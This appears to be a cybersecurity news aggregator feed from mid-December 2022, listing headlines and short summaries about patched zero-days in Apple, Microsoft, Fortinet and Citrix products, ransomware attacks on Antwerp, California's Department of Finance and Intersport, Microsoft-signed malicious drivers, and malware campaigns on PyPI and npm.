                Microsoft on Tuesday disclosed it took steps to suspend accounts that were used to publish malicious drivers that were certified by its Windows Hardware Developer Program, meaning the program was used to sign malware. The tech giant said its investigation revealed the activity was restricted to a number of developer program accounts and that no further compromise was detected. Cryptographically signing malware is

                Autosummary: STONESTOP and POORTRY are said to have been used by UNC3944 in attacks aimed at telecommunication, BPO, MSSP, financial services, cryptocurrency, entertainment, and transportation sectors, SentinelOne said, adding a different threat actor utilized a similar signed driver that resulted in the deployment of Hive ransomware.


                Apple fixed the tenth actively exploited zero-day this year

                exploits
                2022-12-14 https://securityaffairs.co/wordpress/139635/hacking/apple-tenth-actively-exploited-zero-day.html

                Apple rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari to fix a new actively exploited zero-day (CVE-2022-42856). Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively exploited in attacks against iPhones. The flaw is the tenth actively exploited zero-day vulnerability since the start of the […]

                The post Apple fixed the tenth actively exploited zero-day this year appeared first on Security Affairs.

                "



                The Dark Web is Getting Darker - Ransomware Thrives on Illegal Markets

                exploits ransomware
                2022-12-14 https://www.bleepingcomputer.com/news/security/the-dark-web-is-getting-darker-ransomware-thrives-on-illegal-markets/
                The dark web is getting darker as cybercrime gangs increasingly shop their malware, phishing, and ransomware tools on illegal cybercrime markets. [...]

                Autosummary: Threat actors, including script kiddies and people with no hacking experience, increasingly join Ransomware-as-a-Service (RaaS) operations to easily get started extorting victims. The trend toward unique and novel ransomware attacks will continue in 2023: IABs, RaaS groups, and affiliates will increase transactions of initial access, including compromised user credentials that unlock various access tools.


                Open-source repositories flooded by 144,000 phishing packages

                financial
                2022-12-14 https://www.bleepingcomputer.com/news/security/open-source-repositories-flooded-by-144-000-phishing-packages/
                Unknown threat actors have uploaded a total of 144,294 phishing-related packages on the open-source package repositories NuGet, PyPI, and NPM. [...]

                Autosummary: These package descriptions also urged users to click links to get more info about alleged gift card codes, apps, hack tools, etc. Malicious package description (Checkmarx). In some cases, the threat actors promote fake Steam gift card generators, Play Station Network e-gift card codes, Play Store credits, Instagram followers generators, YouTube subscribers generators, and more.


                OSV-Scanner: A free vulnerability scanner for open-source software

                exploits
                2022-12-14 https://www.helpnetsecurity.com/2022/12/14/vulnerabilities-open-source-dependencies/

                After releasing the Open Source Vulnerabilities database (OSV.dev) in February, Google has launched the OSV-Scanner, a free command line vulnerability scanner that open source developers can use to check for vulnerabilities in their projects’ dependencies. Finding vulnerabilities in open-source dependencies “OSV.dev allows all the different open source ecosystems and vulnerability databases to publish and consume information in one simple, precise, and machine readable format,” explained Rex Pan, a software engineer with the Google Open Source … More

                The post OSV-Scanner: A free vulnerability scanner for open-source software appeared first on Help Net Security.


                Attackers use SVG files to smuggle QBot malware onto Windows systems

                exploits
                2022-12-14 https://www.bleepingcomputer.com/news/security/attackers-use-svg-files-to-smuggle-qbot-malware-onto-windows-systems/
                QBot malware phishing campaigns have adopted a new distribution method using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows. [...]

                Autosummary: [Image: Base64-encoded SVG file inside the HTML (Cisco)] Unlike raster image types, such as JPG and PNG files, SVGs are XML-based vector images that can include HTML <script> tags, which is a legitimate feature of that file format.


                Microsoft patches Windows zero-day used to drop ransomware

                exploits ransomware
                2022-12-14 https://www.bleepingcomputer.com/news/security/microsoft-patches-windows-zero-day-used-to-drop-ransomware/
                Microsoft has fixed a security vulnerability used by threat actors to circumvent the Windows SmartScreen security feature and deliver Magniber ransomware and Qbot malware payloads. [...]

                Autosummary: The attackers used malicious standalone JavaScript files to exploit the CVE-2022-44698 zero-day to bypass Mark-of-the-Web security warnings displayed by Windows to alert users that files originating from the Internet should be treated with caution.


                December 2022 Patch Tuesday fixed 2 zero-day flaws

                exploits
                2022-12-14 https://securityaffairs.co/wordpress/139640/security/december-2022-patch-tuesday.html

                Microsoft released December 2022 Patch Tuesday security updates that fix 52 vulnerabilities across its products. Microsoft December 2022 Patch Tuesday security updates addressed 52 vulnerabilities in Microsoft Windows and Windows Components; Azure; Office and Office Components; SysInternals; Microsoft Edge (Chromium-based); SharePoint Server; and the .NET framework. 12 of these vulnerabilities were submitted through the ZDI program. Six vulnerabilities […]

                The post December 2022 Patch Tuesday fixed 2 zero-day flaws appeared first on Security Affairs.


                Update now! Two zero-days fixed in 2022’s last patch Tuesday

                exploits
                2022-12-14 https://www.malwarebytes.com/blog/news/2022/12/update-now-the-last-patch-tuesday-of-2022-fixes-two-zero-days

                Categories: Exploits and vulnerabilities, News

                Tags: patch Tuesday, Microsoft, Android, Apple, Mozilla, Google, Sap, Citrix, Fortinet, Cisco, CVE-2022-44698, MotW, CVE-2022-44710, race condition, CVE-2022-44670, CVE-2022-44676, CVE-2022-41076, remote powershell

                The last patch Tuesday of 2022 is here—find out what Microsoft and many others have fixed

                The post Update now! Two zero-days fixed in 2022’s last patch Tuesday appeared first on Malwarebytes Labs.

                Autosummary: Other vendors: As per usual, other vendors also released important updates: Adobe released updates for Adobe Campaign Classic, Adobe Experience Manager, and Adobe Illustrator. Posted: December 14, 2022. In numbers, the patch Tuesday of December 2022 is a relatively light one for Windows users.


                Play ransomware attacks city of Antwerp

                exploits government ransomware
                2022-12-14 https://www.malwarebytes.com/blog/news/2022/12/play-ransomware-attacks-government-agencies-and-their-providers

                Categories: News, Ransomware

                Tags: Antwerp, Diest, Zwijndrecht, Play, Ragnar Locker, ransomware

                Play ransomware is claiming credit for a devastating attack on Belgium’s largest city.

                The post Play ransomware attacks city of Antwerp appeared first on Malwarebytes Labs.

                Autosummary: According to the leak site, 557 GB of information was stolen, including personal information, passports, other IDs, and financial documents.


                Cybersecurity predictions for 2023: Diversity is key

                ciber
                2022-12-13 https://www.helpnetsecurity.com/2022/12/13/cybersecurity-predictions-2023-diversity-key-video/

                In this Help Net Security video, John Xereas, Executive Director, Technology Solutions at Raytheon Intelligence & Space, offers his cybersecurity predictions for 2023. Specifically, he talks about the need to look at the non-traditional talent that has the potential to thrive in the cyber field. The security industry needs to expand – in terms of diversifying the hiring pool and schools of thought regarding finding cyber solutions for threats like ransomware and malware.

                The post Cybersecurity predictions for 2023: Diversity is key appeared first on Help Net Security.


                Fortinet Warns of Active Exploitation of New SSL-VPN Pre-auth RCE Vulnerability

                exploits
                2022-12-13 https://thehackernews.com/2022/12/fortinet-warns-of-active-exploitation.html
                Fortinet on Monday issued emergency patches for a severe security flaw affecting its FortiOS SSL-VPN product that it said is being actively exploited in the wild. Tracked as CVE-2022-42475 (CVSS score: 9.3), the critical bug relates to a heap-based buffer overflow vulnerability that could allow an unauthenticated attacker to execute arbitrary code via specially crafted requests. The company said


                Cybersecurity Experts Uncover Inner Workings of Destructive Azov Ransomware

                exploits ransomware ciber
                2022-12-13 https://thehackernews.com/2022/12/cybersecurity-experts-uncover-inner.html
                Cybersecurity researchers have published the inner workings of a new wiper called Azov Ransomware that’s deliberately designed to corrupt data and "inflict impeccable damage" to compromised systems. Distributed through another malware loader known as SmokeLoader, the malware has been described as an "effective, fast, and unfortunately unrecoverable data wiper," by Israeli cybersecurity company


                Malware Strains Targeting Python and JavaScript Developers Through Official Repositories

                exploits
                2022-12-13 https://thehackernews.com/2022/12/malware-strains-targeting-python-and.html
                An active malware campaign is targeting the Python Package Index (PyPI) and npm repositories for Python and JavaScript with typosquatted and fake modules that deploy a ransomware strain, marking the latest security issue to affect software supply chains. The typosquatted Python packages all impersonate the popular requests library: dequests, fequests, gequests, rdquests, reauests, reduests,

                Autosummary: The typosquatted Python packages all impersonate the popular requests library: dequests, fequests, gequests, rdquests, reauests, reduests, reeuests, reqhests, reqkests, requesfs, requesta, requeste, requestw, requfsts, resuests, rewuests, rfquests, rrquests, rwquests, telnservrr, and tequests.


                State-sponsored attackers actively exploiting RCE in Citrix devices, patch ASAP! (CVE-2022-27518)

                exploits government
                2022-12-13 https://www.helpnetsecurity.com/2022/12/13/cve-2022-27518-exploited/

                An unauthenticated remote code execution flaw (CVE-2022-27518) is being leveraged by a Chinese state-sponsored group to compromise Citrix Application Delivery Controller (ADC) deployments, the US National Security Agency has warned. “Targeting Citrix ADCs can facilitate illegitimate access to targeted organizations by bypassing normal authentication controls.” About CVE-2022-27518 CVE-2022-27518 stems from the vulnerable devices’ software failing to maintain control over a resource throughout its lifetime (creation, use, and release) and gives remote attackers the opportunity to … More

                The post State-sponsored attackers actively exploiting RCE in Citrix devices, patch ASAP! (CVE-2022-27518) appeared first on Help Net Security.


                Critical FortiOS pre-auth RCE vulnerability exploited by attackers (CVE-2022-42475)

                exploits
                2022-12-13 https://www.helpnetsecurity.com/2022/12/13/cve-2022-42475/

                A critical RCE vulnerability (CVE-2022-42475) in Fortinet’s operating system, FortiOS, is being exploited by attackers, reportedly by a ransomware group. “Fortinet is aware of an instance where this vulnerability was exploited in the wild,” the company said in an advisory published on Monday, but offered no specific details about the attack. About CVE-2022-42475 CVE-2022-42475 is a heap-based buffer overflow vulnerability in FortiOS, and “may allow a remote unauthenticated attacker to execute arbitrary code or commands … More

                The post Critical FortiOS pre-auth RCE vulnerability exploited by attackers (CVE-2022-42475) appeared first on Help Net Security.


                Hackers exploit critical Citrix ADC and Gateway zero day, patch now

                exploits
                2022-12-13 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-citrix-adc-and-gateway-zero-day-patch-now/
                Citrix strongly urges admins to apply security updates for a "Critical" zero-day vulnerability (CVE-2022-27518) in Citrix ADC and Gateway that is actively exploited by state-sponsored hackers to gain access to corporate networks. [...]

                Autosummary: The vulnerability impacts the following versions of Citrix ADC and Citrix Gateway: Citrix ADC and Citrix Gateway 13.0 before 13.0-58.32; Citrix ADC and Citrix Gateway 12.1 before 12.1-65.25; Citrix ADC 12.1-FIPS before 12.1-55.291; Citrix ADC 12.1-NDcPP before 12.1-55.291. The above versions are impacted only if the appliances are configured as a SAML SP (SAML service provider) or SAML IdP (SAML identity provider).


                Serious Attacks Could Have Been Staged Through This Amazon ECR Public Gallery Vulnerability

                exploits
                2022-12-13 https://thehackernews.com/2022/12/serious-attacks-could-have-been-staged.html
                A critical security flaw has been disclosed in Amazon Elastic Container Registry (ECR) Public Gallery that could have been potentially exploited to stage a multitude of attacks, according to cloud security firm Lightspin. "By exploiting this vulnerability, a malicious actor could delete all images in the Amazon ECR Public Gallery or update the image contents to inject malicious code," Gafnit


                LockBit claims attack on California’s Department of Finance

                financial ransomware
                2022-12-13 https://www.bleepingcomputer.com/news/security/lockbit-claims-attack-on-californias-department-of-finance/
                The Department of Finance in California has been the target of a cyberattack now claimed by the LockBit ransomware gang. [...]

                Autosummary: LockBit claims 75GB of stolen files. On Monday, the LockBit ransomware gang posted on their leak site that they had breached the Department of Finance of the state of California and stole databases, confidential data, financial documents, and IT documents.


                Apple fixes new Webkit zero-day used in attacks against iPhones

                exploits
                2022-12-13 https://www.bleepingcomputer.com/news/apple/apple-fixes-new-webkit-zero-day-used-in-attacks-against-iphones/
                In security updates released today, Apple has fixed the tenth zero-day vulnerability since the start of the year, with this latest one actively used in attacks against iPhones. [...]


                Microsoft December 2022 Patch Tuesday fixes 2 zero-days, 49 flaws

                exploits
                2022-12-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-december-2022-patch-tuesday-fixes-2-zero-days-49-flaws/
                Today is Microsoft’s December 2022 Patch Tuesday, and with it comes fixes for two zero-day vulnerabilities, including an actively exploited bug, and a total of 49 flaws. [...]

                Autosummary: The number of bugs in each vulnerability category is listed below: 19 Elevation of Privilege vulnerabilities; 2 Security Feature Bypass vulnerabilities; 23 Remote Code Execution vulnerabilities; 3 Information Disclosure vulnerabilities; 3 Denial of Service vulnerabilities; 1 Spoofing vulnerability. The above counts do not include twenty-five Microsoft Edge vulnerabilities previously fixed on December 5th.


                Microsoft fixes exploited zero-day, revokes certificate used to sign malicious drivers (CVE-2022-44698)

                exploits
                2022-12-13 https://www.helpnetsecurity.com/2022/12/13/cve-2022-44698/

                It’s December 2022 Patch Tuesday, and Microsoft has delivered fixes for 50+ vulnerabilities, including a Windows SmartScreen bypass flaw (CVE-2022-44698) exploited by attackers to deliver a variety of malware. CVE-2022-44698 CVE-2022-44698 affects all Windows OS versions starting from Windows 7 and Windows Server 2008 R2. “The vulnerability has low complexity. It uses the network vector, and requires no privilege escalation. However, it does need user interaction; attackers need to dupe a victim into visiting a … More

                The post Microsoft fixes exploited zero-day, revokes certificate used to sign malicious drivers (CVE-2022-44698) appeared first on Help Net Security.

                Autosummary: “Several distinct malware families, associated with distinct threat actors, have been signed with this process,” Mandiant researchers said, noting that they “identified at least nine unique organization names associated with attestation signed malware.”


                Citrix and NSA urge admins to fix actively exploited zero-day in Citrix ADC and Gateway

                exploits
                2022-12-13 https://securityaffairs.co/wordpress/139609/apt/citrix-adc-gateway-cve-2022-27518.html

                Citrix urges customers to update their installs to fix actively exploited zero-day (CVE-2022-27518) in Citrix ADC and Gateway. Citrix urges administrators to apply security updates for a zero-day vulnerability, tracked as CVE-2022-27518, in Citrix ADC and Gateway. The vulnerability is actively exploited by China-linked threat actors to gain access to target networks. “We are aware […]

                The post Citrix and NSA urge admins to fix actively exploited zero-day in Citrix ADC and Gateway appeared first on Security Affairs.


                Lockbit ransomware gang hacked California Department of Finance

                financial exploits ransomware
                2022-12-13 https://securityaffairs.co/wordpress/139599/cyber-crime/lockbit-ransomware-california-department-of-finance.html

                LockBit ransomware gang hacked the California Department of Finance and threatens to leak data stolen from its systems. The LockBit ransomware gang claims to have stolen 76Gb from the California Department of Finance and is threatening to leak the stolen data if the victims will not pay the ransom by December 24. On December 12, […]

                The post Lockbit ransomware gang hacked California Department of Finance appeared first on Security Affairs.


                Microsoft-signed malicious Windows drivers used in ransomware attacks

                exploits ransomware
                2022-12-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-signed-malicious-windows-drivers-used-in-ransomware-attacks/
                Microsoft has revoked several Microsoft hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents. [...]

                Autosummary: [Image: Signing a driver via the Windows Hardware Compatibility Program (Source: Mandiant)] Toolkit used to terminate security software: In reports released today, researchers explain how they found a new toolkit consisting of two components named STONESTOP (loader) and POORTRY (kernel-mode driver) being used in "bring your own vulnerable driver" (BYOVD) attacks. "Notably, SentinelLabs observed a separate threat actor also utilizing a similar Microsoft signed driver, which resulted in the deployment of Hive ransomware against a target in the medical industry, indicating a broader use of this technique by various actors with access to similar tooling," explained the SentinelLabs researchers. "We were notified of this activity by SentinelOne, Mandiant, and Sophos on October 19, 2022, and subsequently performed an investigation into this activity."


                Silence is golden partner for Truebot and Clop ransomware

                exploits ransomware
                2022-12-13 https://www.malwarebytes.com/blog/news/2022/12/silence-is-golden-partner-for-truebot-and-clop-ransomware

                Categories: News, Ransomware

                Tags: Silence, TA505, Clop ransomware, Truebot, Grace, Cobalt Strike, Teleport, FIN11

                Researchers have identified two new Truebot botnets that are using new versions of the Truebot downloader Trojan to infiltrate and explore a target’s network.

                The post Silence is golden partner for Truebot and Clop ransomware appeared first on Malwarebytes Labs.

                Autosummary: The other botnet is almost exclusively composed of Windows servers, directly connected to the internet, and exposes several Windows services such as SMB, RDP, and WinRM. For those purposes, this new version of Truebot collects this information: a screenshot, the computer name, the local network name, and active directory trust relations. Exfiltration: Besides the usual suspects designed to act as a backdoor, Cobalt Strike and Grace, the researchers also found a new data exfiltration tool.


                Apple security update fixes new iOS zero-day used to hack iPhones

                exploits
                2022-12-13 https://www.bleepingcomputer.com/news/apple/apple-security-update-fixes-new-ios-zero-day-used-to-hack-iphones/
                In security updates released today, Apple has fixed the tenth zero-day vulnerability since the start of the year, with this latest one actively used in attacks against iPhones. [...]


                Product showcase: The Intruder vulnerability management platform

                exploits
                2022-12-12 https://www.helpnetsecurity.com/2022/12/12/product-showcase-intruder-vulnerability-management-platform/

                Vulnerability scanning is a fundamental component of every good cyber security strategy – but it can be challenging to get right. Intruder created a vulnerability management platform to make it simple and save time, so that every business can enjoy the same level of security as banks and governments worldwide but without the complexity. Whether you’re just starting out on your cyber security journey or looking to improve existing security controls, Intruder effortlessly finds cyber … More

                The post Product showcase: The Intruder vulnerability management platform appeared first on Help Net Security.

                Autosummary: To make it easier, Intruder provides an up-to-date view of your attack surface to help you to: Increase visibility: get a clear picture of what’s accessible across your internet-facing infrastructure and easily hunt for services that could expose you to risk; Preview web assets: identify any web services that don’t belong on the internet, such as exposed infrastructure or application admin panels; Stay on top of changes: use services like Slack to notify your technical team about important changes to your network as soon as they happen; React faster: when zero-days are discovered, we help identify your risk and limit your exposure, even when there is no official vulnerability check available. Conclusion: Effective cyber security starts with getting the basics right.


                Preventing a ransomware attack with intelligence: Strategies for CISOs

                exploits ransomware
                2022-12-12 https://www.helpnetsecurity.com/2022/12/12/preventing-a-ransomware-attack-with-intelligence-strategies-for-cisos/

                Bad news first: Ransomware isn’t going anywhere. The good news? The right intelligence can help organizations dramatically reduce risk surrounding a cyber extortion event. In fact, when organizations are armed with intelligence that’s timely, relevant, and actionable, they can bolster their own cyber defense measures and even prevent a ransomware attack from occurring in the first place. Knowledge is power More good news: We know how ransomware “gangs” work and, for the most part, what … More

                The post Preventing a ransomware attack with intelligence: Strategies for CISOs appeared first on Help Net Security.

                Autosummary: For instance, with vulnerability intelligence that includes exploit availability, attack type, impact, disclosure patterns, and other characteristics, vulnerability management teams predict the likelihood that a vulnerability could be used in a ransomware attack.


                Axiomatics Orchestrated Authorization enhancements centralize authorization strategy

                industry
                2022-12-12 https://www.helpnetsecurity.com/2022/12/12/axiomatics-orchestrated-authorization-strategy/

                Axiomatics has introduced the next evolution of its Orchestrated Authorization strategy. Through new capabilities and enhancements to the authorization solution, Axiomatics now offers the adaptable and scalable implementation of fine-grained access control (FGAC). This enables enterprises to centralize their authorization strategy while decentralizing policy modeling, testing, deployment, and analysis. “With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security … More

                The post Axiomatics Orchestrated Authorization enhancements centralize authorization strategy appeared first on Help Net Security.

                Autosummary: “With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security teams alone, but require support from the broader enterprise, including both development and the business,” said Mark Cassetta, chief product officer for Axiomatics.


                Royal Ransomware Threat Takes Aim at U.S. Healthcare System

                exploits ransomware
                2022-12-12 https://thehackernews.com/2022/12/royal-ransomware-threat-takes-aim-at-us.html
                The U.S. Department of Health and Human Services (HHS) has cautioned of ongoing Royal ransomware attacks targeting healthcare entities in the country. "While most of the known ransomware operators have performed Ransomware-as-a-Service, Royal appears to be a private group without any affiliates while maintaining financial motivation as their goal," the agency’s Health Sector Cybersecurity


                TrueBot infections were observed in Clop ransomware attacks

                exploits ransomware
                2022-12-12 https://securityaffairs.co/wordpress/139527/malware/truebot-infections-clop-ransomware-attacks.html

                Researchers reported an increase in TrueBot infections; attackers have shifted from using malicious emails as their primary delivery method to other techniques. Cisco Talos researchers reported an increase in TrueBot infections; threat actors have shifted from using malicious emails as their primary attack vector to other techniques. Truebot has been active since 2017 and some researchers linked it to […]

                The post TrueBot infections were observed in Clop ransomware attacks appeared first on Security Affairs.

                Autosummary: “The attackers, however, appear to have switched to an unknown TrueBot distribution mechanism starting in November, with the vector succeeding in co-opting over 500 internet-facing Windows servers located in the U.S., Canada, and Brazil into a botnet,” concludes the report, which also includes Indicators of Compromise (IoCs).


                Vulnerability with public PoC affects Cisco IP phones, fix unavailable (CVE-2022-20968)

                exploits
                2022-12-12 https://www.helpnetsecurity.com/2022/12/12/cve-2022-20968/

                A high-risk stack overflow vulnerability (CVE-2022-20968) may allow attackers to DoS or possibly even execute code remotely on Cisco 7800 and 8800 Series IP phones, the company has confirmed. Cisco‘s PSIRT is also aware that proof-of-concept exploit code is available for the vulnerability and that the flaw has been publicly discussed, but they are not aware of active attacks exploiting it. About CVE-2022-20968 Cisco IP Phone 7800 and 8800 Series are enterprise-grade devices for video … More

                The post Vulnerability with public PoC affects Cisco IP phones, fix unavailable (CVE-2022-20968) appeared first on Help Net Security.

                Autosummary: The vulnerability can be exploited without prior authentication on the part of the attacker, but the attack must be launched from the same physical or logical network as the target device (e.g., via Bluetooth, Wi-Fi, neighbor discovery protocol, etc.).


                Fortinet says SSL-VPN pre-auth RCE bug is exploited in attacks

                exploits
                2022-12-12 https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/
                Fortinet urges customers to patch their appliances against an actively exploited FortiOS SSL-VPN vulnerability that could allow unauthenticated remote code execution on devices. [...]

                Autosummary: [...] Fortinet warned that the following file system artifacts would be present on exploited devices: /data/lib/libips.bak, /data/lib/libgif.so, /data/lib/libiptcp.so, /data/lib/libipudp.so, /data/lib/libjepg.so.


                Indiana sues TikTok, describes it as "Chinese Trojan Horse"

                exploits
                2022-12-12 https://www.malwarebytes.com/blog/news/2022/12/indiana-sues-tiktok-describes-it-as-chinese-trojan-horse

                Categories: News

                Tags: TikTok, ban TikTok, states that banned TikTok, Indiana bans TikTok, Maryland bans TikTok, Shou Zi Chew, Brendan Carr, ByteDance, Brooke Oberwetter

                The State of Indiana has filed two lawsuits against TikTok, Inc, the company behind the same name app, and its parent company, ByteDance.

                The post Indiana sues TikTok, describes it as "Chinese Trojan Horse" appeared first on Malwarebytes Labs.

                Autosummary: TikTok declined to comment on the lawsuits; however, its spokesperson, Brooke Oberwetter, was quoted by The New York Times saying, "the safety, privacy, and security of our community is our top priority."


                Cryptocurrency Mining Campaign Hits Linux Users with Go-based CHAOS Malware

                exploits
                2022-12-12 https://thehackernews.com/2022/12/cryptocurrency-mining-campaign-hits.html
                A cryptocurrency mining attack targeting the Linux operating system also involved the use of an open source remote access trojan (RAT) dubbed CHAOS. The threat, which was spotted by Trend Micro in November 2022, remains virtually unchanged in all other aspects, including when it comes to terminating competing malware, security software, and deploying the Monero (XMR) cryptocurrency miner. "The


                Cryptomining campaign targets Linux systems with Go-based CHAOS Malware

                exploits
                2022-12-12 https://securityaffairs.co/wordpress/139554/cyber-crime/cryptocurrency-mining-campaign-chaos-malware.html

                Researchers spotted a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). In November 2022, Trend Micro researchers discovered a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). The Chaos RAT is based on an open-source project. Like the original project, the malware is able to terminate competing malware, security […]

                The post Cryptomining campaign targets Linux systems with Go-based CHAOS Malware appeared first on Security Affairs.

                Autosummary: The Go-based RAT supports the following functions: perform a reverse shell, download files, upload files, delete files, take screenshots, access the file explorer, gather operating system information, restart the PC, shut down the PC, and open a URL. “On the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might seem relatively minor,” the researchers conclude.


                New Python malware backdoors VMware ESXi servers for remote access

                exploits
                2022-12-12 https://www.bleepingcomputer.com/news/security/new-python-malware-backdoors-vmware-esxi-servers-for-remote-access/
                A previously undocumented Python backdoor targeting VMware ESXi servers has been spotted, enabling hackers to execute commands remotely on a compromised system. [...]

                Autosummary: Additional lines added to the ESXi file (Juniper Networks). One of those lines launches a Python script saved as "/store/packages/vmtools.py," in a directory that stores VM disk images, logs, and more.


                Uber suffers new data breach after attack on vendor, info leaked online

                financial
                2022-12-12 https://www.bleepingcomputer.com/news/security/uber-suffers-new-data-breach-after-attack-on-vendor-info-leaked-online/
                Uber has suffered a new data breach after a threat actor leaked employee email addresses, corporate reports, and IT asset information stolen from a third-party vendor in a cybersecurity incident. [...]

                Autosummary: BleepingComputer has been told that the newly leaked data consists of source code, IT asset management reports, data destruction reports, Windows domain login names and email addresses, and other corporate information.


                Hive ransomware gang claims responsibility for attack on Intersport that left cash registers disabled

                exploits ransomware
                2022-12-12 https://www.bitdefender.com/blog/hotforsecurity/hive-ransomware-gang-claims-responsibility-for-attack-on-intersport-that-left-cash-registers-disabled/
                Sports retail giant Intersport, which boasts some 6000 stores worldwide in 57 countries, has fallen victim to a ransomware attack which disabled checkouts in France during what should have been one of the busiest times of the year. Read more in my article on the Hot for Security blog.


                Fortinet urges customers to fix actively exploited FortiOS SSL-VPN bug

                exploits
                2022-12-12 https://securityaffairs.co/wordpress/139569/hacking/fortinet-fortios-ssl-vpn-bug.html

                Fortinet fixed an actively exploited FortiOS SSL-VPN flaw that could allow a remote, unauthenticated attacker to execute arbitrary code on devices. Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices. The CVE-2022-42475 flaw […]

                The post Fortinet urges customers to fix actively exploited FortiOS SSL-VPN bug appeared first on Security Affairs.


                Play ransomware claims attack on Belgium city of Antwerp

                exploits government ransomware
                2022-12-12 https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-belgium-city-of-antwerp/
                The Play ransomware operation has claimed responsibility for a recent cyberattack on the Belgian city of Antwerp. [...]


                Cybersecurity Trends 2023: Securing our hybrid lives

                ciber
                2022-12-12 https://www.welivesecurity.com/2022/12/12/cybersecurity-trends-2023-securing-our-hybrid-lives/

                ESET experts offer their reflections on what the continued blurring of boundaries between different spheres of life means for our human and social experience – and especially our cybersecurity and privacy

                The post Cybersecurity Trends 2023: Securing our hybrid lives appeared first on WeLiveSecurity

                Autosummary: Going about our days without tech is practically unthinkable, and this applies to various aspects of our digitally-driven lives, notably work, education, health, leisure, and social interactions. For many, the cloud is best “embodied” in a range of collaboration, videoconferencing, productivity and networking platforms du jour – think Microsoft Teams, Slack or Zoom.


                Pwn2Own Toronto 2022 Day 4: $989K awarded for 63 unique zero-days

                exploits
                2022-12-11 https://securityaffairs.co/wordpress/139516/hacking/pwn2own-toronto-2022-day4.html

                Pwn2Own Toronto 2022 has ended, and the participants earned a total of $989,750 for 63 unique zero-day exploits. The Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition has ended and these are the final numbers for the event: DEVCORE and @orange_8361 won Master of Pwn for Toronto 2022. “And we are finished! All of […]

                The post Pwn2Own Toronto 2022 Day 4: $989K awarded for 63 unique zero-days appeared first on Security Affairs.

                Autosummary: The Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition has ended, and these are the final numbers for the event: $989,750 awarded, 63 unique 0-days, 66 entries, and 36 different teams representing 14+ countries. See you at #Pwn2Own Miami in February!


                Clop ransomware partners with TrueBot malware for access to networks

                exploits ransomware
                2022-12-11 https://www.bleepingcomputer.com/news/security/clop-ransomware-partners-with-truebot-malware-for-access-to-networks/
                Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence. [...]

                Autosummary: Silence continued their attacks, and in three years between 2016 and 2019 they stole at least $4.2 million from banks in the former Soviet Union, Europe, Latin America, and Asia (Silence/Truebot activity June 2016 - July 2019, source: Group-IB). Group-IB researchers describe Silence hackers as highly skilled, being able to reverse engineer malware to modify it for their purpose or to adapt, at the assembler instruction level, an exploit used by the nation-state group Fancy Bear. Post-infection activity leading to Clop deployment (Cisco Talos): “During the exploration and lateral movement phases, the attackers browsed key server and desktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to an attacker-controlled server,” Cisco Talos researchers explain.


                Clop ransomware uses TrueBot malware for access to networks

                exploits ransomware
                2022-12-11 https://www.bleepingcomputer.com/news/security/clop-ransomware-uses-truebot-malware-for-access-to-networks/
                Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence. [...]

                Autosummary: Silence continued their attacks, and in three years between 2016 and 2019 they stole at least $4.2 million from banks in the former Soviet Union, Europe, Latin America, and Asia (Silence/Truebot activity June 2016 - July 2019, source: Group-IB). Group-IB researchers describe Silence hackers as highly skilled, being able to reverse engineer malware to modify it for their purpose or to adapt, at the assembler instruction level, an exploit used by the nation-state group Fancy Bear. Post-infection activity leading to Clop deployment (Cisco Talos): “During the exploration and lateral movement phases, the attackers browsed key server and desktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to an attacker-controlled server,” Cisco Talos researchers explain.


                The Week in Ransomware - December 9th 2022 - Wide Impact

                exploits ransomware
                2022-12-10 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-9th-2022-wide-impact/
                This week has been filled with research reports and news of significant attacks having a wide impact on many organizations. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @struppigel, @PolarToffee, @Seifreed, @fwosar, @DanielGallagher, @BleepinComputer, @Ionut_Ilascu, @LawrenceAbrams, @jorntvdw, @demonslay335, @billtoulas, @FourOctets, @VK_Intel, @serghei, @malwrhunterteam, @malwareforme, @pcrisk, @Unit42_Intel, @Fortinet, @briankrebs, @morphisec, @smgoreli, and @Phylum_IO. Unlike many other ransomware groups such as LockBit that follow a typical ransomware-as-a-service (RaaS) model, Vice Society’s operations are different in that they’ve been known for using forks of pre-existing ransomware families in their attack chain that are sold on DarkWeb marketplaces.


                Hack-for-Hire Group Targets Travel and Financial Entities with New Janicab Malware Variant

                financial exploits
                2022-12-10 https://thehackernews.com/2022/12/hack-for-hire-group-targets-travel-and.html
                Travel agencies have emerged as the target of a hack-for-hire group dubbed Evilnum as part of a broader campaign aimed at legal and financial investment institutions in the Middle East and Europe. The attacks targeting law firms throughout 2020 and 2021 involved a revamped variant of a malware called Janicab that leverages a number of public services like YouTube as dead drop resolvers,

                Autosummary: As legal and financial sectors are a common target for the threat actor, the researchers further theorized that DeathStalker's customers and operators could be weaponizing the intrusions to keep tabs on lawsuits, blackmail high-profile individuals, track financial assets, and harvest business intelligence about potential mergers and acquisitions.


                US HHS warns healthcare orgs of Royal Ransomware attacks

                exploits ransomware
                2022-12-10 https://securityaffairs.co/wordpress/139486/cyber-crime/us-hhs-royal-ransomware-attacks.html

